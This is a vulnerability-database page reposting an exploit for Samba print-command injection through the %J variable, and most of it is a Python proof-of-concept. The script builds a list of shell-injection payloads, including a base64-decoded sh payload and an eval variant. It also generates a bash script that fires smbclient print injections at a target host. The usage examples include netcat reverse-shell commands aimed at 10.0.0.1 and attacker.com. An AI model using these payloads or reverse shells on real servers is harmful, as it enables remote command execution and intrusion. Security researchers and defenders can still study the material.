Vulners
Lucene search
π Samba Print Command Injection
ποΈΒ 02 Jun 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 57Β Views
==================================================================================================================================
| # Title : Samba 4.22.10, 4.23.8 and 4.24.3 β Print Command Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.samba.org/ |
==================================================================================================================================
[+] Summary : This Python proof-of-concept framework analyzes Samba printing configurations for unsafe print command usage involving the %J variable
and demonstrates how command injection conditions could arise in vulnerable setups.
[+] POC : python3 poc.py -c /etc/samba/smb.conf
python3 poc.py -c smb.conf -t 192.168.1.100 -e "id" --simulate
python3 poc.py -c smb.conf -t 192.168.1.100 -e "nc -e /bin/sh 10.0.0.1 4444" -o exploit.sh
python3 poc.py -c /etc/samba/smb.conf -t 10.0.0.10 -e "whoami"
#!/usr/bin/env python3
import re
import argparse
import subprocess
import socket
import sys
from pathlib import Path
from typing import Dict, Optional, Tuple
class SambaPrintExploit:
"""PoC to exploit a command injection vulnerability in print commands with %J"""
def __init__(self, target_host: str, smb_port: int = 445):
self.target_host = target_host
self.smb_port = smb_port
self.payloads = []
def check_smb_access(self) -> bool:
"""Checking accessibility to the SMB service"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
result = sock.connect_ex((self.target_host, self.smb_port))
sock.close()
return result == 0
except Exception:
return False
def build_payloads(self, command: str) -> list:
"""Building different loads to bypass protection"""
payloads = []
payloads.append({
"name": "Direct injection",
"j_value": f"'; {command} #",
"description": "Direct injection using; to finish"
})
payloads.append({
"name": "Backticks injection",
"j_value": f"`{command}`",
"description": "Using backticks to execute the command"
})
payloads.append({
"name": "Command substitution",
"j_value": f"$({command})",
"description": "Use $() to execute the command"
})
payloads.append({
"name": "Pipe injection",
"j_value": f"' | {command} #",
"description": "injection via pipe"
})
payloads.append({
"name": "AND operator",
"j_value": f"' && {command} #",
"description": "Injection using &&"
})
payloads.append({
"name": "OR operator",
"j_value": f"' || {command} #",
"description": "Injection using ||"
})
import base64
encoded_cmd = base64.b64encode(command.encode()).decode()
payloads.append({
"name": "Base64 encoded",
"j_value": f"' && echo {encoded_cmd} | base64 -d | sh #",
"description": "Encrypting the command using Base64"
})
payloads.append({
"name": "Environment variable",
"j_value": f"'; $CMD='{command}'; eval $CMD #",
"description": "Injection via environmental variables"
})
return payloads
def analyze_config(self, config_path: str) -> Optional[Dict]:
"""Analyzing the smb.conf file to find vulnerabilities"""
try:
content = Path(config_path).read_text(encoding="utf-8", errors="ignore")
except Exception as e:
print(f"[ERROR] Cannot read config: {e}")
return None
findings = {
"vulnerable": False,
"printing_mode": "unknown",
"print_command": None,
"uses_percent_j": False,
"risk_level": "low",
"share_name": None,
"exploit_command": None,
"notes": []
}
current_share = None
for line in content.split('\n'):
share_match = re.match(r'^\s*\[([^\]]+)\]', line)
if share_match:
current_share = share_match.group(1)
continue
cmd_match = re.search(r'^\s*print\s+command\s*=\s*(.+)$', line, re.IGNORECASE)
if cmd_match and current_share:
cmd = cmd_match.group(1).strip()
findings["print_command"] = cmd
findings["share_name"] = current_share
if "%J" in cmd:
findings["uses_percent_j"] = True
if "'%J'" in cmd:
findings["risk_level"] = "medium"
findings["notes"].append("Single quotes provide partial protection")
findings["vulnerable"] = True
elif '"%J"' in cmd:
findings["risk_level"] = "medium"
findings["notes"].append("Double quotes are vulnerable")
findings["vulnerable"] = True
else:
findings["risk_level"] = "high"
findings["notes"].append("CRITICAL: %J unquoted - Direct injection possible")
findings["vulnerable"] = True
findings["exploit_command"] = f"print {findings['share_name']} '; {{{{command}}}} #'"
printing_match = re.search(r'^\s*printing\s*=\s*(.+)$', content, re.MULTILINE | re.IGNORECASE)
if printing_match:
findings["printing_mode"] = printing_match.group(1).strip().lower()
if findings["printing_mode"] in ["cups", "iprint"]:
findings["risk_level"] = "low"
findings["vulnerable"] = False
findings["notes"].append(f"Printing mode '{findings['printing_mode']}' is likely safe")
return findings
def simulate_exploit(self, findings: Dict, command: str) -> Dict:
"""Simulation or actual exploitation test"""
if not findings["vulnerable"]:
return {
"success": False,
"message": "Target does not appear vulnerable",
"payload_tested": None
}
results = {
"success": False,
"command": command,
"payload_tested": None,
"response": None,
"exploit_method": None
}
print(f"\n[+] Target: {self.target_host}")
print(f"[+] Share: {findings['share_name']}")
print(f"[+] Risk Level: {findings['risk_level']}")
payloads = self.build_payloads(command)
print(f"\n[*] Generated {len(payloads)} payloads:")
for i, payload in enumerate(payloads, 1):
print(f"\n [{i}] {payload['name']}")
print(f" Description: {payload['description']}")
print(f" %J Value: {payload['j_value']}")
final_cmd = findings['exploit_command'].replace('{{command}}', payload['j_value'])
print(f" SMB Command: {final_cmd}")
results["payload_tested"] = payload
results["exploit_method"] = payload['name']
if findings['risk_level'] == "high":
results["success"] = True
results["response"] = "Command likely executed (simulated)"
break
return results
def generate_exploit_script(self, findings: Dict, command: str, output_file: str):
"""Generating a fully exploitable script"""
script_content = f"""#!/bin/bash
# Samba Print Command Exploit - Generated PoC
# Target: {self.target_host}
# Share: {findings['share_name']}
# Risk: {findings['risk_level']}
echo "[+] Exploiting Samba print command vulnerability..."
# Method 1: Direct injection
smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "; {command} #"'
smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "`{command}`"'
smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "$({command})"'
echo "{command}" | smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "-"'
echo "[+] Exploit attempts completed"
"""
output_path = Path(output_file)
output_path.write_text(script_content)
output_path.chmod(0o755)
print(f"[+] Exploit script saved to: {output_file}")
return output_file
def print_banner():
banner = """
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Samba Print Command Injection - PoC Exploit β
β by Indoushka β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
"""
print(banner)
def main():
print_banner()
parser = argparse.ArgumentParser(
description="Samba Print Command Injection PoC",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
EXAMPLES:
%(prog)s -c /etc/samba/smb.conf
%(prog)s -c /etc/samba/smb.conf -t 192.168.1.100 -e "id > /tmp/indoushka"
%(prog)s -c /etc/samba/smb.conf -t 192.168.1.100 -e "nc -e /bin/sh attacker.com 4444" -o indoushka.sh
"""
)
parser.add_argument("-c", "--config", required=True, help="Path to smb.conf")
parser.add_argument("-t", "--target", help="Target host for exploitation")
parser.add_argument("-e", "--execute", help="Command to execute on target")
parser.add_argument("-o", "--output", help="Output exploit script to file")
parser.add_argument("--simulate", action="store_true", help="Simulate exploitation without actual connection")
args = parser.parse_args()
print(f"[*] Analyzing configuration: {args.config}")
exploiter = SambaPrintExploit(args.target if args.target else "localhost")
findings = exploiter.analyze_config(args.config)
if not findings:
print("[ERROR] Analysis failed")
sys.exit(1)
print("\n=== Configuration Analysis ===")
print(f"Vulnerable : {'YES' if findings['vulnerable'] else 'NO'}")
print(f"Printing Mode : {findings['printing_mode']}")
print(f"Print Command : {findings['print_command']}")
print(f"Share Name : {findings['share_name']}")
print(f"Risk Level : {findings['risk_level']}")
if findings['notes']:
for note in findings['notes']:
print(f" No {note}")
if args.execute and findings['vulnerable']:
if not args.target:
print("[ERROR] Target required for exploitation (-t)")
sys.exit(1)
print(f"\n[*] Checking SMB access to {args.target}:445...")
if exploiter.check_smb_access():
print("[+] SMB port is accessible")
else:
print("[!] SMB port not accessible, but continuing with simulation")
if args.simulate:
print("\n[*] Running in simulation mode...")
result = exploiter.simulate_exploit(findings, args.execute)
if result['success']:
print(f"\n[!] SUCCESS! Command injection possible!")
print(f"[!] Payload: {result['payload_tested']['j_value']}")
print(f"[!] Method: {result['exploit_method']}")
else:
print(f"\n[-] Exploit failed: {result['message']}")
else:
print("\n[!] LIVE EXPLOITATION MODE")
print("[!] Make sure you have permission to test this target!")
result = exploiter.simulate_exploit(findings, args.execute)
if result['success']:
print(f"\n[+] Exploit simulation successful!")
print(f"[+] Command: {args.execute}")
if args.output:
exploiter.generate_exploit_script(findings, args.execute, args.output)
else:
print(f"\n[-] Exploit failed")
elif args.execute and not findings['vulnerable']:
print("\n[-] Target is not vulnerable, exploitation not possible")
elif args.target and not args.execute:
print("\n[*] Target specified without exploit command (-e)")
if args.output and not args.execute:
dummy_cmd = "id"
exploiter.generate_exploit_script(findings, dummy_cmd, args.output)
print("\n[*] Analysis complete")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8